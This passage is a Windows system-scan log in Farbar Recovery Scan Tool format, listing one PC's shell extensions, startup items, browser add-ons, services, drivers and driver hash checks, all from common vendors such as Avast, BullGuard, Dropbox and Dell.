HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\avastSS.scr [53208 2016-10-03] (AVAST Software)
Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-10-03] (AVAST Software)
ShellIconOverlayIdentifiers: [BackupOverlayErr] -> {8749448C-D907-45BF-A842-4D3898894AC8} => C:\Program Files\BullGuard Ltd\BullGuard\BackupShellHook.dll [2016-12-12] (BullGuard Ltd.)
ShellIconOverlayIdentifiers: [BackupOverlayInProgress] -> {3FFBF330-7839-476B-BE14-2C8597CE11B6} => C:\Program Files\BullGuard Ltd\BullGuard\BackupShellHook.dll [2016-12-12] (BullGuard Ltd.)
ShellIconOverlayIdentifiers: [BackupOverlaySynced] -> {C62CF4DB-48CB-4B03-BFD0-30A29125FA49} => C:\Program Files\BullGuard Ltd\BullGuard\BackupShellHook.dll [2016-12-12] (BullGuard Ltd.)
ShellIconOverlayIdentifiers: [DBRShellOverlayBackupFile] -> {831CEBDD-6BAF-4432-BE76-9E0989C14AEF} => C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIconBackuped.dll [2014-12-30] (Softthinks SAS)
ShellIconOverlayIdentifiers: [DBRShellOverlayModifiedBackupFile] -> {275E4FD7-21EF-45CF-A836-832E5D2CC1B3} => C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBROverlayIconNotBackuped.dll [2014-12-30] (Softthinks SAS)
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-12-21] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk [2015-12-22]
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ERUNT AutoBackup.lnk [2017-01-07]
ShortcutTarget: ERUNT AutoBackup.lnk -> D:\Program Files (x86)\ERUNT\AUTOBACK.EXE (No File)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.254.254
Tcpip\..\Interfaces\{D97DFD45-2154-4A46-8F80-68A5472C7513}: [DhcpNameServer] 192.168.254.254
 
Internet Explorer:
==================
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://dell13.msn.com/?pc=DCTE
HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell13.msn.com/?pc=DCTE
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-21-1863785947-2063213224-1850305329-1000 -> DefaultScope {2B5C0A4C-99CC-46EB-B17C-C75AFE7B4F4D} URL = 
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2016-10-24] (AVAST Software)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-26] (Google Inc.)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2016-10-24] (AVAST Software)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-26] (Google Inc.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-26] (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-26] (Google Inc.)
Toolbar: HKU\S-1-5-21-1863785947-2063213224-1850305329-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-26] (Google Inc.)
 
FireFox:
========
FF ProfilePath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\xcdclexh.default-1479927646311 [2017-01-10]
FF Extension: (Nav Bar Height) - C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\xcdclexh.default-1479927646311\Extensions\{70768549-a666-4368-8efa-6d24ad93777a}.xpi [2016-11-28]
FF Extension: (Themes Menu) - C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\xcdclexh.default-1479927646311\Extensions\{84625510-7e5d-11e0-a411-0800200c9a66}.xpi [2016-11-28]
FF Extension: (Theme Font & Size Changer) - C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\xcdclexh.default-1479927646311\Extensions\{f69e22c7-bc50-414a-9269-0f5c344cd94c}.xpi [2017-01-06]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: (Avast Online Security) - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-10-03]
FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: (Avast SafePrice) - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-10-03]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF HKLM-x32\...\Firefox\Extensions: [antiphishing@bullguard] - C:\Program Files\BullGuard Ltd\BullGuard\Files32\Antiphishing\FF\antiphishing@bullguard => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_24_0_0_186.dll [2017-01-08] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-08-24] (Adobe Systems)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_24_0_0_186.dll [2017-01-08] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-07-10] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-07-10] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2016-12-16] (Google Inc.)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2016-06-23] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-08-24] (Adobe Systems)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin HKU\S-1-5-21-1863785947-2063213224-1850305329-1000: @citrixonline.com/appdetectorplugin -> C:\Users\Owner\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-02-12] (Citrix Online)
 
Chrome: 
=======
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default [2017-01-10]
CHR Extension: (Google Slides) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-02-01]
CHR Extension: (BetterTTV) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ajopnjidmegmdimjlfnijceegpefgped [2016-08-03]
CHR Extension: (Google Docs) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-02-01]
CHR Extension: (Google Drive) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-01]
CHR Extension: (YouTube) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-01]
CHR Extension: (Google Search) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-01]
CHR Extension: (Avast SafePrice) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\eofcbnmajmjmplflapaojjnihcjkigck [2016-11-22]
CHR Extension: (Google Sheets) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-02-01]
CHR Extension: (Google Docs Offline) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-22]
CHR Extension: (Avast Online Security) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-12-20]
CHR Extension: (Make America Kittens Again) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\klchnmggepghlcolikgaekpibclpmgcm [2017-01-07]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-10]
CHR Extension: (Gmail) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-02-01]
CHR Extension: (Chrome Media Router) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-20]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-08-24] (Adobe Systems Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2218712 2016-12-13] (Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-09-22] (Apple Inc.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [197128 2016-10-03] (AVAST Software)
R2 BsBackup; C:\Program Files\BullGuard Ltd\BullGuard\BsBackup.dll [1540376 2017-01-09] (BullGuard Ltd.)
R2 BsBhvScan; C:\Program Files\BullGuard Ltd\BullGuard\BullGuardBhvScanner.exe [705304 2016-12-12] (BullGuard Ltd.)
R2 BsCache; C:\Program Files\BullGuard Ltd\BullGuard\BsCache.dll [184600 2016-12-12] (BullGuard Ltd.)
R2 BsFileScan; C:\Program Files\BullGuard Ltd\BullGuard\BsFileScan.dll [487704 2016-12-12] (BullGuard Ltd.)
R2 BsFire; C:\Program Files\BullGuard Ltd\BullGuard\BsFire.dll [860952 2016-12-12] (BullGuard Ltd.)
R2 BsMailProxy; C:\Program Files\BullGuard Ltd\BullGuard\BsMailProxy\BsMailProxy.dll [5660440 2016-12-12] (BullGuard Ltd.)
R2 BsMain; C:\Program Files\BullGuard Ltd\BullGuard\BsMain.dll [652056 2016-12-12] (BullGuard Ltd.)
R2 BsScanner; C:\Program Files\BullGuard Ltd\BullGuard\BullGuardScanner.exe [317208 2016-12-12] (BullGuard Ltd.)
R2 BsUpdate; C:\Program Files\BullGuard Ltd\BullGuard\BullGuardUpdate.exe [409880 2016-12-12] (BullGuard Ltd.)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-08-04] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-08-04] (Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [42096 2016-12-21] (Dropbox, Inc.)
R2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [97616 2016-11-30] (Dell)
R2 DellDataVault; C:\Program Files\Dell\DellDataVault\DellDataVault.exe [2572024 2016-06-23] (Dell Inc.)
R2 DellDataVaultWiz; C:\Program Files\Dell\DellDataVault\DellDataVaultWiz.exe [202488 2016-06-23] (Dell Inc.)
R2 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [237272 2015-08-27] (Dell Inc.)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163712 2016-06-14] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [18856 2015-06-23] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-21] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [207648 2015-09-04] (Intel Corporation)
R2 MBAMService; D:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4317648 2016-12-14] (Malwarebytes)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-06-14] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3632576 2016-06-14] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2521024 2016-06-14] (NVIDIA Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [294616 2015-05-22] (Realtek Semiconductor)
R2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe [2020240 2015-01-23] (SoftThinks SAS)
R2 SupportAssistAgent; C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe [31704 2016-09-09] (Dell Inc.)
R2 WavesSysSvc; C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe [563456 2015-01-19] (Waves Audio Ltd.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2015-07-22] (Microsoft Corporation)
R2 wltrysvc; C:\Program Files\Dell\DW WLAN Card\bcmwltry.exe [6179840 2015-12-22] (Dell Inc.) [File not signed]
R2 WTabletServicePro; C:\Program Files\Tablet\Wacom\WTabletServicePro.exe [742864 2016-03-21] (Wacom Technology, Corp.)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 AFW; C:\Windows\System32\DRIVERS\afw.sys [52904 2016-01-13] (Agnitum Ltd.)
R3 afwcore; C:\Windows\System32\DRIVERS\afwcore.sys [465072 2016-01-13] (Agnitum Ltd.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [37656 2016-10-03] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [37144 2016-10-03] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [108816 2016-10-03] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [103064 2016-10-03] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [74544 2016-10-03] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [969184 2016-10-03] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [513632 2016-10-03] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [163416 2016-10-03] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [293352 2016-10-13] (AVAST Software)
R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [172760 2015-12-22] (Broadcom Corporation.)
R1 BdAgent; C:\Windows\System32\DRIVERS\BdAgent.sys [174744 2016-08-31] (BullGuard Ltd.)
R3 BdNet; C:\Windows\System32\DRIVERS\BdNet.sys [33968 2016-01-13] (BullGuard Ltd.)
R1 BdSpy; C:\Windows\System32\DRIVERS\BdSpy.sys [76728 2016-01-13] (BullGuard Ltd.)
R3 DDDriver; C:\Windows\System32\drivers\DDDriver64Dcsa.sys [32464 2016-01-05] (Dell Computer Corporation)
R3 DellProf; C:\Windows\System32\drivers\DellProf.sys [24240 2016-01-05] (Dell Computer Corporation)
R3 e1dexpress; C:\Windows\System32\DRIVERS\e1d62x64.sys [501216 2015-07-09] (Intel Corporation)
R1 epp; C:\EEK\bin64\epp.sys [114968 2016-10-31] (Emsisoft Ltd)
R0 iaStorF; C:\Windows\System32\drivers\iaStorF.sys [31144 2015-06-22] (Intel Corporation)
R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [250816 2017-01-10] (Malwarebytes)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [179456 2015-08-31] (Intel Corporation)
R1 NovaShieldFilterDriver; C:\Windows\System32\DRIVERS\NSKernel.sys [325752 2016-07-11] (BullGuard Ltd.)
R1 NovaShieldTDIDriver; C:\Windows\System32\DRIVERS\NSNetmon.sys [26504 2016-07-11] (BullGuard Ltd.)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-06-14] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [56384 2016-04-13] (NVIDIA Corporation)
R3 Trufos; C:\Windows\System32\DRIVERS\Trufos.sys [485512 2016-03-31] (BitDefender S.R.L.)
R3 WacHidRouterPro; C:\Windows\System32\DRIVERS\wachidrouter.sys [102864 2016-03-02] (Wacom Technology)
R3 XSplit_Dummy; C:\Windows\System32\drivers\xspltspk.sys [26200 2015-05-25] (SplitmediaLabs Limited)
S3 dbx; system32\DRIVERS\dbx.sys [X]
 
========================== Drivers MD5 =======================
 
C:\Windows\system32\drivers\1394ohci.sys ==> MD5 is legit
C:\Windows\System32\drivers\ACPI.sys ==> MD5 is legit
C:\Windows\system32\drivers\acpipmi.sys ==> MD5 is legit
C:\Windows\system32\drivers\adp94xx.sys ==> MD5 is legit
C:\Windows\system32\drivers\adpahci.sys ==> MD5 is legit
C:\Windows\system32\drivers\adpu320.sys ==> MD5 is legit
C:\Windows\system32\drivers\afd.sys 9A4A1EEE802BF2F878EE8EAB407B21B7
C:\Windows\System32\DRIVERS\afw.sys 20A097D973450A0947F5A20AAF017C4B
C:\Windows\System32\DRIVERS\afwcore.sys B3ED3395EDD1A0AA41D427EF03C5D2D8
C:\Windows\system32\drivers\agp440.sys ==> MD5 is legit
C:\Windows\system32\drivers\aliide.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdide.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdk8.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdppm.sys ==> MD5 is legit
C:\Windows\system32\drivers\amdsata.sys D4121AE6D0C0E7E13AA221AA57EF2D49
C:\Windows\system32\drivers\amdsbs.sys ==> MD5 is legit
C:\Windows\System32\drivers\amdxata.sys 540DAF1CEA6094886D72126FD7C33048
C:\Windows\System32\drivers\AmUStor.SYS 68D013557924832D119132C43A1D6A8D
C:\Windows\system32\drivers\appid.sys FCE5C79717A487BDC71F3DEC78A684CA
C:\Windows\system32\drivers\arc.sys ==> MD5 is legit
C:\Windows\system32\drivers\arcsas.sys ==> MD5 is legit
C:\Windows\system32\drivers\aswHwid.sys 9B480B472D6826E7257C90E2D0EE2954
C:\Windows\system32\drivers\aswKbd.sys 06362BBA1347CBA0996F4B39BB1D8353
C:\Windows\system32\drivers\aswMonFlt.sys 1BB00571CC2C78463ABD7E9C32970758
C:\Windows\system32\drivers\aswRdr2.sys 7010B57D708DA5C9686A5923EE621776
C:\Windows\System32\Drivers\aswRvrt.sys 937885085BFE5BD08EC1BC0245DD203B
C:\Windows\system32\drivers\aswSnx.sys 0B6352251C5D84130DF4252D33D266C2
C:\Windows\system32\drivers\aswSP.sys 28213B34725B18387CC1B8C3D73858A1
C:\Windows\system32\drivers\aswStm.sys 9C58B6E9663D0A76D00D83E43C765BDF
C:\Windows\System32\Drivers\aswVmm.sys D60D9201739400F0FBDB9E36A3212D91
C:\Windows\System32\DRIVERS\asyncmac.sys ==> MD5 is legit
C:\Windows\system32\drivers\atapi.sys ==> MD5 is legit
C:\Windows\system32\drivers\bxvbda.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\b57nd60a.sys ==> MD5 is legit
C:\Windows\System32\drivers\bcbtums.sys 8F3AB137A758D19B7BF393EB36E0E55C
C:\Windows\System32\drivers\BCM42RLY.sys 52AC4A6E660622F721069A61207BDA46
C:\Windows\System32\DRIVERS\bcmwl664.sys 4183CBCA7A58B6D2AC4C88F28E2E8D08
C:\Windows\System32\DRIVERS\BdAgent.sys 0B5DF12623BD11761C5880D9E6277875
C:\Windows\System32\DRIVERS\BdNet.sys A3EAEDB9B2DFD840254451918B658F1C
C:\Windows\System32\DRIVERS\BdSpy.sys 48E3FD3A2F6759652E110B1236B2DB20
C:\Windows\System32\Drivers\Beep.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\blbdrive.sys ==> MD5 is legit
C:\Windows\System32\DRIVERS\bowser.sys ABA3984C822E4D3F889699912D85D6C5
C:\Windows\system32\drivers\BrFiltLo.sys ==> MD5 is legit
C:\Windows\system32\drivers\BrFiltUp.sys ==> MD5 is legit
C:\Windows\System32\Drivers\Brserid.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrSerWdm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrUsbMdm.sys ==> MD5 is legit
C:\Windows\System32\Drivers\BrUsbSer.sys ==> MD5 is legit
